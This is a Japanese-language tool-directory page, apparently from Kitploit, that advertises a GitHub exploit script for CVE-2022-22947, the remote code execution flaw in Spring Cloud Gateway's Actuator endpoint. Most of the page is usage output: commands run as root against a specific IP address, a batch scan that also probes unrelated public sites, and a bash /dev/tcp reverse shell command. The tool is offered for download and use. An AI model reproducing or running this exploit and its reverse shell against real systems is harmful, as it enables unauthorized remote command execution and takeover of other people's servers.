Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-22947_EXP — 個別または一括で検証でき、シェルをリバース接続することもできるスクリプト。 | Kitploit
ツール/GitHubGitHub/anansec/cve-2022-22947_exp
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubanansec/cve-2022-22947_exp

CVE-2022-22947_EXP

個別または一括で検証でき、シェルをリバース接続することもできるスクリプト。

リポジトリを見る
714年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

一、Spring Cloud Gateway リモートコード実行脆弱性

危険度:高

POC/EXP状況:公開済み

CNVD番号:CNNVD-2022-16402

​ CVE番号:CVE-2022-22947

二、影響範囲:

    • VMWare Spring Cloud GateWay 3.1.0
    • VMWare Spring Cloud GateWay >=3.0.0,<=3.0.6
    • VMWare Spring Cloud GateWay <3.0.0

三、脆弱性の説明

Spring Cloud Gateway にはリモートコード実行脆弱性が存在します。この脆弱性は Spring Cloud Gateway アプリケーションの Actuator エンドポイントで発生し、有効化・公開されており安全でない場合にコードインジェクション攻撃を受けやすくなります。攻撃者はこの脆弱性を悪用して、悪意あるリクエストを作成し、リモートホスト上で任意のコマンドを実行できます。

四、CVE-2022-22947 EXP の使用

(一)スクリプトの特徴

1、単一ターゲットの検証をサポート

2、バッチ脆弱性検証をサポート

3、リバースシェルをサポート

(二)スクリプトパラメータ

root@kitploit:~
-h   ヘルプ情報を表示
-u   URLターゲットを指定
-c   実行するコマンドを指定(デフォルト: id)
-f   ターゲットURLファイルを指定

(三)スクリプトの使用方法

1. 単一ターゲット検証

方法1:

root@kitploit:~
E:\pocs>python cve-2022-22947.py

    単一ターゲット検証:
            1、python cve-2022-22947.py  インタラクティブモードに入力後、プロンプトに従ってターゲットURLと実行するコマンドを入力してください。コマンドが正しいことを確認してください。
            2、python cve-2022-22947.py  -u http://example.com -c whoami
        複数ターゲットの検証:
            1、python cve-2022-22947.py -f url.txt 、検証するターゲットをすべてurl.txtファイルに記述してください。
        リバースシェル:
            1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2、インタラクティブモードに入力し、ターゲットとリバースシェル用のコマンドを入力してください。

ターゲットURLを入力してください:http://123.58.236.76:8484
実行するコマンドを入力してください(デフォルト: id):whoami
[+]ターゲット:http://123.58.236.76:8484 , コマンド実行結果取得成功:['root\\n']

方法2:

root@kitploit:~
E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami

    単一ターゲット検証:
            1、python cve-2022-22947.py  インタラクティブモードに入力後、プロンプトに従ってターゲットURLと実行するコマンドを入力してください。コマンドが正しいことを確認してください。
            2、python cve-2022-22947.py  -u http://example.com -c whoami
        複数ターゲットの検証:
            1、python cve-2022-22947.py -f url.txt 、検証するターゲットをすべてurl.txtファイルに記述してください。
        リバースシェル:
            1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2、インタラクティブモードに入力し、ターゲットとリバースシェル用のコマンドを入力してください。

[+]ターゲット:http://123.58.236.76:8484 , コマンド実行結果取得成功:['root\\n']

2. バッチ検証

root@kitploit:~
E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt

    単一ターゲット検証:
            1、python cve-2022-22947.py  インタラクティブモードに入力後、プロンプトに従ってターゲットURLと実行するコマンドを入力してください。コマンドが正しいことを確認してください。
            2、python cve-2022-22947.py  -u http://example.com -c whoami
        複数ターゲットの検証:
            1、python cve-2022-22947.py -f url.txt 、検証するターゲットをすべてurl.txtファイルに記述してください。
        リバースシェル:
            1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2、インタラクティブモードに入力し、ターゲットとリバースシェル用のコマンドを入力してください。

[+]ターゲット:http://123.58.236.76:8484 , コマンド実行結果取得成功:['uid=0(root']
[+]ターゲット:http://123.58.236.76:8484 , コマンド実行結果取得成功:['uid=0(root']
[+]ターゲット:http://123.58.236.76:8484 , コマンド実行結果取得成功:['uid=0(root']
[-]ターゲット:http://www.baidu.com, 脆弱性検証失敗。手動で検証してください!
[-]ターゲット:http://www.qq.com, 脆弱性検証失敗。手動で検証してください!
[+]ターゲット:http://123.58.236.76:8484 , コマンド実行結果取得成功:['uid=0(root']

3. リバースシェル

root@kitploit:~
python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"

image-20220519233354807

image-20220519233429912

ツールをダウンロード